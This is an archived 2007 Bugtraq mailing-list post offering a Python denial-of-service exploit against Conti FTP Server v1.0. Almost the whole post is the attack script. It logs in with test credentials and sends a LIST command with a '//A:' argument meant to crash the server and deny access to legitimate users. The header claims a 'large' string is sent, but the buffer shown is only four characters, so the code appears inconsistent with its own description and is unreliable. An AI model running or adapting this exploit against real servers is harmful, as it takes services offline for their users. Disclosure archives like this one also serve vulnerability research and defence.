| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <20070627032417.58197DA827@mailserver7.hushmail.com>
Date: Wed, 27 Jun 2007 03:24:16 +0000
From: <esc6@...h.com>
To: <bugtraq@...urityfocus.com>
Cc:
Subject: Conti FTP Server v1.0 DoS
#Conti FTP Server v1.0 Denial of Service
#author: 35c666
#contact: :(
#Download:
http://www.procesualitatea.ro/bestplay/Conti_FtpServer_Setup.exe
#Bug: Conti Ftp Server crashes when a large //A: string is sent,
denying legitimate users access to their accounts.
#greetz to all RST members at http://rstzone.net
# usr/bin/python
import socket
import time
buff = "//A:"
user = "test"
password = "test"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("172.16.112.129",21))
d = s.recv(1024)
print "Server <- " + d
time.sleep(2)
s.send('USER %s\r\n' % user)
print "Client -> USER " + user
d = s.recv(1024)
print "Server <- " + d
time.sleep(2)
s.send('PASS %s\r\n' % password)
print "Client -> PASS " + password
d = s.recv(1024)
print "Server <- " + d
time.sleep(2)
s.send('LIST %s\r\n' % buff)
print "Client -> LIST " + buff
d = s.recv(1024)
print d
time.sleep(2)
except:
print "- Nu m-am putut conecta."
--
Click for FHA loan, $0 lender fees, low rates & approvals nationwide
http://tagline.hushmail.com/fc/Ioyw6h4dOJ5vAvidooorO3QwkYqsdtxW1lWMSsqYoY19IzyPIitWQU/
Powered by blists - more mailing lists